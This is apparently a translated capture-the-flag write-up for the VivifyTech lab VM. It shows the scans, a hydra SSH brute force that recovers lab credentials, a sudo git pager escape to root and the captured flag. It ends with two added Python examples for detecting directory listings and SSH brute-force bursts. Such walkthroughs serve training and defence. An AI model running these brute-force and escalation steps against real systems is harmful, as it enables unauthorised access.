Penetration approach

  • Information gathering
  • Port scan
  • Port service information
  • Directory scan
  • Brute force: hydra -- ssh
  • git privilege escalation

Information gathering

    ┌──(kali㉿kali)-[~]
    └─$ fping -ag 192.168.9.0/24 2>/dev/null
    192.168.9.119 -- host
    192.168.9.164 -- target

As a personal habit, and to make the later steps easier, assign the IP address to a variable, ip:

    ┌──(kali㉿kali)-[~]
    └─$ ip=192.168.9.164

    ┌──(kali㉿kali)-[~]
    └─$ echo $ip
    192.168.9.164

Port scan

    ┌──(kali㉿kali)-[~]
    └─$ sudo nmap -p- 192.168.9.164 --min-rate 10000
    [sudo] kali 的密码
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-29 05:27 EDT
    sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 192.168.9.163, 16) => Operation not permitted
    Offending packet: TCP 192.168.9.119:38222 > 192.168.9.163:64573 S ttl=58 id=33393 iplen=44 seq=1503250300 win=1024 <mss 1460>
    Nmap scan report for 192.168.9.163
    Host is up (0.085s latency).
    Not shown: 65531 closed tcp ports (reset)
    PORT      STATE SERVICE
    22/tcp    open  ssh
    80/tcp    open  http
    3306/tcp  open  mysql
    33060/tcp open  mysqlx
    MAC Address: 08:00:27:EC:74:96 (Oracle VirtualBox virtual NIC)

    Nmap done: 1 IP address (1 host up) scanned in 66.54 seconds

The open ports include 3306 (the MySQL database port) and 33060 (mysqlx). I did not know what 33060 was, so I looked it up: MySQL X is a newer protocol for MySQL databases that supports document storage and asynchronous operations, and it is typically used to implement more advanced database features.

Port service information

    ┌──(kali㉿kali)-[~]
    └─$ sudo nmap -sT -sV -O -p- $ip
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-29 05:48 EDT
    Nmap scan report for 192.168.9.164
    Host is up (0.010s latency).
    Not shown: 65531 closed tcp ports (conn-refused)
    PORT      STATE SERVICE VERSION
    22/tcp    open  ssh     OpenSSH 9.2p1 Debian 2deb12u1 (protocol 2.0)
    80/tcp    open  http    Apache httpd 2.4.57 ((Debian))
    3306/tcp  open  mysql   MySQL (unauthorized)
    33060/tcp open  mysqlx?
    1 service unrecognized despite returning data.
    If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    MAC Address: 08:00:27:EC:74:96 (Oracle VirtualBox virtual NIC)
    Device type: general purpose
    Running: Linux 4.X|5.X
    OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
    OS details: Linux 4.15 - 5.6
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 26.86 seconds

Port 80 is as shown in the figure; the next step is a directory scan.

Directory scan

    ┌──(kali㉿kali)-[~]
    └─$ sudo dirsearch -u http://192.168.9.164 -x 500,404

      _|. _ _  _  _  _ _|_    v0.4.3
     (_||| _) (/_(_|| (_| )

    Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

    Output File: /home/kali/reports/http_192.168.9.164/_24-04-29_05-53-24.txt

    Target: http://192.168.9.164/

    [05:53:24] Starting:
    [05:53:27] 403 - 278B - /.ht_wsr.txt
    [05:53:27] 403 - 278B - /.htaccess.orig
    [05:53:27] 403 - 278B - /.htaccess.bak1
    [05:53:27] 403 - 278B - /.htaccess.save
    [05:53:27] 403 - 278B - /.htaccess.sample
    [05:53:27] 403 - 278B - /.htaccess_sc
    [05:53:27] 403 - 278B - /.htaccessOLD
    [05:53:27] 403 - 278B - /.htm
    [05:53:27] 403 - 278B - /.htaccess_orig
    [05:53:27] 403 - 278B - /.htaccessOLD2
    [05:53:27] 403 - 278B - /.htaccess_extra
    [05:53:27] 403 - 278B - /.htaccessBAK
    [05:53:27] 403 - 278B - /.html
    [05:53:27] 403 - 278B - /.htpasswds
    [05:53:27] 403 - 278B - /.httr-oauth
    [05:53:28] 403 - 278B - /.htpasswd_test
    [05:53:29] 403 - 278B - /.php
    [05:54:28] 403 - 278B - /server-status
    [05:54:28] 403 - 278B - /server-status/
    [05:54:49] 200 - 2KB - /wordpress/wp-login.php
    [05:54:50] 200 - 14KB - /wordpress/

    Task Completed

The scan found a wordpress directory and a login page. This is clearly the WordPress CMS, so scan that directory as well.

    ┌──(kali㉿kali)-[~]
    └─$ sudo dirsearch -u http://192.168.9.164/wordpress/
    [sudo] kali 的密码

      _|. _ _  _  _  _ _|_    v0.4.3
     (_||| _) (/_(_|| (_| )

    Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

    Output File: /home/kali/reports/http_192.168.9.164/_wordpress__24-04-29_06-17-53.txt

    Target: http://192.168.9.164/

    ...
    [06:18:33] 301 - 0B - /wordpress/index.php -> http://192.168.9.164/wordpress/
    [06:18:34] 404 - 55KB - /wordpress/index.php/login/
    [06:18:37] 200 - 7KB - /wordpress/license.txt
    [06:18:54] 200 - 3KB - /wordpress/readme.html
    [06:19:16] 301 - 327B - /wordpress/wp-admin -> http://192.168.9.164/wordpress/wp-admin/
    [06:19:16] 400 - 1B - /wordpress/wp-admin/admin-ajax.php
    [06:19:16] 409 - 3KB - /wordpress/wp-admin/setup-config.php
    [06:19:16] 200 - 0B - /wordpress/wp-config.php
    [06:19:16] 200 - 498B - /wordpress/wp-admin/install.php
    [06:19:16] 302 - 0B - /wordpress/wp-admin/ -> http://192.168.9.164/wordpress/wp-login.php?redirect_to=http%3A%2F%2F192.168.9.164%2Fwordpress%2Fwp-admin%2F&reauth=1
    [06:19:16] 301 - 329B - /wordpress/wp-content -> http://192.168.9.164/wordpress/wp-content/
    [06:19:16] 200 - 0B - /wordpress/wp-content/
    [06:19:16] 200 - 84B - /wordpress/wp-content/plugins/akismet/akismet.php
    [06:19:16] 500 - 0B - /wordpress/wp-content/plugins/hello.php
    [06:19:16] 200 - 422B - /wordpress/wp-content/upgrade/
    [06:19:16] 200 - 483B - /wordpress/wp-content/uploads/
    [06:19:17] 301 - 330B - /wordpress/wp-includes -> http://192.168.9.164/wordpress/wp-includes/
    [06:19:17] 200 - 5KB - /wordpress/wp-includes/
    [06:19:17] 200 - 0B - /wordpress/wp-cron.php
    [06:19:17] 200 - 2KB - /wordpress/wp-login.php
    [06:19:17] 200 - 0B - /wordpress/wp-includes/rss-functions.php
    [06:19:17] 302 - 0B - /wordpress/wp-signup.php -> http://192.168.9.164/wordpress/wp-login.php?action=register
    [06:19:17] 405 - 42B - /wordpress/xmlrpc.php

Many paths return 200, so I visited them one by one. A browsable directory listing is exposed at http://192.168.9.164/wordpress/wp-includes/. Every .php file there either renders as a blank page (it is executed by the server) or cannot be accessed. Eventually one file stood out:

http://192.168.9.164/wordpress/wp-includes/secrets.txt is a text file that looks like a list of users' passwords, but I did not know where the usernames were. After reading a write-up by a foreign author I found the users .... My English is poor, which is a real weakness; whenever I run into English I automatically skip over it.

Brute force: hydra -- ssh

First download the password list:

    ┌──(kali㉿kali)-[~]
    └─$ wget http://192.168.9.164/wordpress/wp-includes/secrets.txt
    --2024-04-29 06:46:52-- http://192.168.9.164/wordpress/wp-includes/secrets.txt
    正在连接 192.168.9.164:80... 已连接。
    已发出 HTTP 请求正在等待回应... 200 OK
    长度439 [text/plain]
    正在保存至: “secrets.txt”

    secrets.txt 100%[] 439 --.-KB/s 用时 0s

    2024-04-29 06:46:52 (14.1 MB/s) - 已保存 “secrets.txt” [439/439])

Create the user list:

    sarah
    mark
    emily
    jake
    alex

    ┌──(kali㉿kali)-[~]
    └─$ sudo hydra -L user.txt -P secrets.txt $ip ssh
    Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-29 06:53:36
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 240 login tries (l:5/p:48), ~15 tries per task
    [DATA] attacking ssh://192.168.9.164:22/
    [22][ssh] host: 192.168.9.164 login: sarah password: bohicon
    1 of 1 target successfully completed, 1 valid password found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-29 06:54:28

This yields the credentials sarah / bohicon, and the login succeeds:

    ┌──(kali㉿kali)-[~]
    └─$ ssh sarah@$ip
    The authenticity of host '192.168.9.164 (192.168.9.164)' can't be established.
    ED25519 key fingerprint is SHA256:i4eLII3uzJGiSMrTFLLAnrihC0r7/y6uuO7YMmGF7Rs.
    This key is not known by any other names
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '192.168.9.164' (ED25519) to the list of known hosts.
    sarah@192.168.9.164's password:
    Linux VivifyTech 6.1.0-13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.55-1 (2023-09-29) x86_64
    ########################################
    Welcome to VivifyTech !
    ## The place to be :) #
    #######################################
    Last login: Tue Dec 5 17:54:16 2023 from 192.168.177.129
    sarah@VivifyTech:~$ sudo -l
    [sudo] password for sarah:
    Sorry, user sarah may not run sudo on VivifyTech.
    sarah@VivifyTech:~$ whoami
    sarah
    sarah@VivifyTech:~$ ls -al
    total 32
    drwx------ 4 sarah sarah 4096 Dec 5 17:53 .
    drwxr-xr-x 6 root  root  4096 Dec 5 16:00 ..
    -rw------- 1 sarah sarah    0 Dec 5 17:53 .bash_history
    -rw-r--r-- 1 sarah sarah  245 Dec 5 17:33 .bash_logout
    -rw-r--r-- 1 sarah sarah 3565 Dec 5 17:48 .bashrc
    -rw------- 1 sarah sarah    0 Dec 5 17:49 .history
    drwxr-xr-x 3 sarah sarah 4096 Dec 5 16:19 .local
    drwxr-xr-x 2 sarah sarah 4096 Dec 5 16:19 .private
    -rw-r--r-- 1 sarah sarah  807 Dec 5 15:57 .profile
    -rw-r--r-- 1 sarah sarah   27 Dec 5 16:22 user.txt

After moving over to the gbodja user, the escalation route turns out to be git.

git privilege escalation

`git -p` sends the help text through the pager, and entering `!/bin/bash` at the pager prompt starts a shell that inherits root from sudo:

    sudo git -p help config
    !/bin/bash
    root@VivifyTech:/home/sarah/.private# id
    uid=0(root) gid=0(root) groups=0(root)
    root@VivifyTech:/home/sarah/.private# cd /root
    root@VivifyTech:~# ls
    root.txt
    root@VivifyTech:~# cat root.txt
    HMV{Y4NV!7Ch3N1N_Y0u_4r3_7h3_R007_8672}
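
A check for the exposure found in the directory scan step (a browsable /wordpress/wp-includes/ index that reveals secrets.txt), written as an added example that is not part of the original write-up. The response body is constructed, and `review_listing`, `IndexParser` and the extension list are names and choices assumed here.

```python
from html.parser import HTMLParser
from pathlib import PurePosixPath

# Extensions that rarely belong in a served application directory (assumed list).
RISKY_EXT = {".txt", ".bak", ".old", ".sql", ".zip", ".log", ".env", ".swp"}

# Constructed response body in the style of an Apache mod_autoindex page.
SAMPLE_BODY = """<html><head><title>Index of /wordpress/wp-includes</title></head>
<body><h1>Index of /wordpress/wp-includes</h1><table>
<tr><td><a href="?C=N;O=D">Name</a></td></tr>
<tr><td><a href="/wordpress/">Parent Directory</a></td></tr>
<tr><td><a href="blocks/">blocks/</a></td></tr>
<tr><td><a href="cache.php">cache.php</a></td></tr>
<tr><td><a href="secrets.txt">secrets.txt</a></td></tr>
</table></body></html>"""


class IndexParser(HTMLParser):
    """Collects the page title and every link target."""

    def __init__(self):
        super().__init__()
        self.in_title = False
        self.title = ""
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self.in_title = True
        elif tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.links.append(href)

    def handle_endtag(self, tag):
        if tag == "title":
            self.in_title = False

    def handle_data(self, data):
        if self.in_title:
            self.title += data


def review_listing(body):
    """Report whether a body is an auto-generated index and which entries need review."""
    parser = IndexParser()
    parser.feed(body)
    is_listing = parser.title.strip().startswith("Index of ")
    # Skip sort links ("?C=N;O=D") and the absolute parent-directory link.
    entries = [h for h in parser.links if not h.startswith(("?", "/"))]
    risky = [h for h in entries if PurePosixPath(h).suffix.lower() in RISKY_EXT]
    return {"listing_enabled": is_listing, "entries": entries,
            "risky": risky if is_listing else []}
```

On Apache, removing `Indexes` from the directory's `Options` stops the index page from being generated; the stray file itself still has to be deleted.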
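
Detection logic for the hydra step, as an added example that is not part of the original write-up: it flags a source address that produces a burst of failed SSH password attempts and records any login that then succeeds from that same source. The log lines are constructed in OpenSSH's syslog format, and the function name, the 60-second window, the five-failure threshold and the year are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE = re.compile(
    r"^(\w{3}\s+\d+ [\d:]{8}) \S+ sshd\[\d+\]: (Failed|Accepted) password "
    r"for (?:invalid user )?(\S+) from (\S+) port \d+"
)

# Constructed sample log (not captured from the target).
SAMPLE_LOG = """\
Apr 29 06:50:02 VivifyTech sshd[1180]: Failed password for mark from 192.168.9.50 port 51514 ssh2
Apr 29 06:50:09 VivifyTech sshd[1180]: Accepted password for mark from 192.168.9.50 port 51514 ssh2
Apr 29 06:53:37 VivifyTech sshd[1201]: Failed password for sarah from 192.168.9.119 port 40112 ssh2
Apr 29 06:53:37 VivifyTech sshd[1202]: Failed password for mark from 192.168.9.119 port 40114 ssh2
Apr 29 06:53:38 VivifyTech sshd[1203]: Failed password for emily from 192.168.9.119 port 40116 ssh2
Apr 29 06:53:38 VivifyTech sshd[1204]: Failed password for jake from 192.168.9.119 port 40118 ssh2
Apr 29 06:53:39 VivifyTech sshd[1205]: Failed password for alex from 192.168.9.119 port 40120 ssh2
Apr 29 06:53:41 VivifyTech sshd[1206]: Failed password for sarah from 192.168.9.119 port 40122 ssh2
Apr 29 06:54:20 VivifyTech sshd[1290]: Accepted password for sarah from 192.168.9.119 port 40300 ssh2
"""


def detect(log_text, year=2024, window=timedelta(seconds=60), min_failures=5):
    """Return {source_ip: alert} for sources that exceed the failure threshold."""
    recent = defaultdict(deque)  # source -> (time, user) failures still inside the window
    alerts = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        stamp, outcome, user, src = m.groups()
        # Syslog timestamps carry no year, so one is supplied by the caller.
        when = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        fails = recent[src]
        while fails and when - fails[0][0] > window:
            fails.popleft()  # forget failures older than the window
        if outcome == "Failed":
            fails.append((when, user))
        if len(fails) >= min_failures:
            alert = alerts.setdefault(
                src, {"users_tried": set(), "peak_failures": 0, "compromised": []})
            alert["users_tried"].update(u for _, u in fails)
            alert["peak_failures"] = max(alert["peak_failures"], len(fails))
            if outcome == "Accepted":
                # A success right after a burst means a guessed credential.
                alert["compromised"].append(user)
    return alerts
```

The single mistyped password from 192.168.9.50 stays below the threshold, so an ordinary login is not reported.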